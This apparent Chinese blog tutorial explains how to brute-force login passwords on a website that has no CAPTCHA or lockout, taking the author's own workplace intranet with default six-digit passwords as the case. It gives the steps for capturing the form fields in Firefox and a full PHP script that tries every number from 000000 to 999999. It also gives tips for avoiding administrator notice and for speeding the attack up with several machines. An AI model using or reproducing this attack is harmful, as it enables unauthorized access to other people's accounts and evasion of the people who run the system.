有一种网站，没有验证码；有一种网站，你可以利用某种手段获取到登陆者的用户名（比如邮箱啦等等，用户名你是知道的），你所不知道的仅仅是登录密码，有没有什么方法可以破解呢？ 

    我们单位有一个内网（虽是内网，但有时在家也可以登录），用户名可以搞到，密码原始是六位的数字（其实大多数人都没有修改过），而且牛叉的是，这个网站登录时，如果输入错误次数过多也不会让你输入验证码，这太好了，心中窃喜，可以用暴力破解法嘛。 


     暴力破解，要用到遍历，直到试出你要的用户名为止，这些都简单，关键是如何用技术去实现。其实这种技术，说白了就是网络机器人，网络机器人有很多种，有名字的比如蜘蛛、爬虫等等，大概就是依据对http协议的了解，去编写自动化的网络操作。注意，自动化这三个字很关键，因为传统的浏览器模式无法实现自动化。 

     编写这个暴力破解网站密码的网络机器人，要用到php，因为php简直就是为了网络而生的，有相当方便的函数供使用，很方便，而且php是脚本语言，用起来也容易。在这里，我是拿php当shell脚本用的，直接在windows的控制台里执行，没这么用过的哥们自己上网找找，这我就不过多解释了。 

     本次破解过程所用到的原材料有：php环境，firfox，一个名为LIB_http.php的php库（是某个大牛写的，我这里借用一下，会用到这个库里的http()函数，这个库的下载连接地址为：http://www.webbotsspidersscreenscrapers.com/DSP_download.php），好了，就这三个，下面开讲。 



    先说说破解的大致思路，正常情况下我们用浏览器，填写用户名和密码，然后点击提交按钮，信息就被发送到后端，如果用户名和密码错误，将返回登陆页面，反之则返回成功页面。 

     那么，我们要做的就是，模拟浏览器的这种行为，然后根据返回的结果判定密码是否正确。 

     第一步，为了完全100%的模拟浏览器，我们必须先要知晓点击“提交”按钮后，都发送了哪些数据，如果只发送密码和用户名，其他数据对不上，后台服务器就会产生一个异常，而且更可怕的是，这会引起管理员的注意，搞不好会封掉你的ip，那你就玩完了。 
     
     关键是怎么才能知道提交了哪些数据呢？用firfox吧，里面有一个很牛叉的功能。用firfox登录你想破解的网站，单击右键选择“查看元素”，点“控制台”，点“网络”下拉框，选中“记录请求和响应主体”。这样一来就可以利用firfox为我们抓包了。之前有人推荐firdebug，未免是大材小用了，其实firfox原本的东东就够了，而且很好。在登录页面上随便输入一个用户名和密码，点击“登录”，可以在控制台看到http请求，一般要找post型的。点击打开，在“已发送表单数据”可以看到都发送了那些数据，要记录下来，一些asp.net的网站，由于用到了一些验证控件，会出现不少东西，比如__VIEWSTATE之类的，甭管它，记下来，过会用。对了，有一点忘说了，用firfox这个工具，还可以知道提交的目标地址（比如有时候是一个servlet，或者是jsp，aspx都可能，要看好）和上连接（不知道上连接的请自行补脑）。 

     知道发什么数据了，就要开始编程序了，源代码如下： 

<?php include("php_lib/LIB_http.php"); error_reporting(E_ALL^E_NOTICE);//除去notice提示 $action="登陆页面提交的后台地址，查看方法上面已讲"; $method="POST";//注意，必须是大写，GET方法也一样 $ref="上连接地址，查看方法上面已讲"; $data_array['ctl00$MainContent$tbStuId']="";//要发送的数据，都写到一个数组里，数据的查看方法上面已讲。 $data_array['ctl00$MainContent$tbIdentityId']=""; $data_array['ctl00$MainContent$LoginUser$UserName']="用户名"; //$data_array['ctl00$MainContent$LoginUser$Password']=$strpass（密码）; $data_array['ctl00$MainContent$LoginUser$LoginButton']="登录"; $data_array['__VIEWSTATE']="/wEPDwUKMTM2OTQ5MzkyMA9kFgJmD2QWAgIDD2QWBgIDDw9kFgIeBXN0eWxlBRJtYXJnaW4tbGVmdDoxNjBweDsWBAIBDzwrAAUBAA8WAh4HVmlzaWJsZWhkZAIDDw9kFgIfAAUzZGlzcGxheTpibG9jazttYXJnaW4tbGVmdDoxMDBweDttYXJnaW4tcmlnaHQ6MTAwcHg7ZAIFDw8WBh4FV2lkdGgbAAAAAAAAZEABAAAAHgRfIVNCAoACHwFoZGQCBw8PFgIeBFRleHQF+AHljJfkuqzluILlrabnlJ/otYTliqnkuovliqHnrqHnkIbkuK3lv4PniYjmnYPmiYDmnIkmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDvljJfkuqzlt6XllYblpKflrabnoJTliLYmbmJzcDsmbmJzcDsmbmJzcDvCqTIwMTEtMjAxM2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBSZjdGwwMCRNYWluQ29udGVudCRMb2dpblVzZXIkUmVtZW1iZXJNZcVB092mLxjWH8VqPqNfoiesnMTTfv/8XLUqN0IvHeWh";$data_array['__EVENTVALIDATION']="/wEdAAg4OGQHZT9XqX7BisSv3xvacc3fpmfwSgCZgt7RGgsQTYT2MeBFtJvt+JB+if6UByL53d8HLcsMPPSWw23i74K4rVJzD9epthGmOWrcxXKP7u1vquycB/s6+IJJa4hgd+jsl1raoinWIrD1aNCfPQQ5CQtH8leGQTiMCnhMu4O3EZWz6MelE6yxI8DG7fS+/BYQQRNWIIZPR21FZQRefgAc";$data_array['__EVENTTARGET']=""; $data_array['__EVENTARGUMENT']=""; for($pass=000000; $pass<999999;$pass++){ $strpass=strval($pass); $data_array['ctl00$MainContent$LoginUser$Password']=$strpass; $response = http($target=$action,$ref,$method,$data_array,EXCL_HEAD); $str = $response['STATUS']; echo $pass." "; if($str['url']=="登录成功后的跳转页面"){ echo "\n\n\nthe result is:".$pass."\n";//输出密码 return; } //echo $str['url']."\n"; } 
?> 

上面的代码完全没问题，你要改动的，仅仅是$data_array数组的内容，这要依据firfox去查看。上面的数组$data_array内容是我自己的，你们破解的时候还是要用firfox自己去看，一定不能错，否走后台出异常，而且数据不能多，不能少，类型也必须对。 


好吧，就到这里了，如果你网速快的话，1分钟试验300~400个密码没有问题，如果多用几台电脑就更快了，在我写这段文字的时候，我的电脑还在破解一个密码，要等到明天一早了，先睡了。对了，这都告诉你们了，可千万别干坏事啊。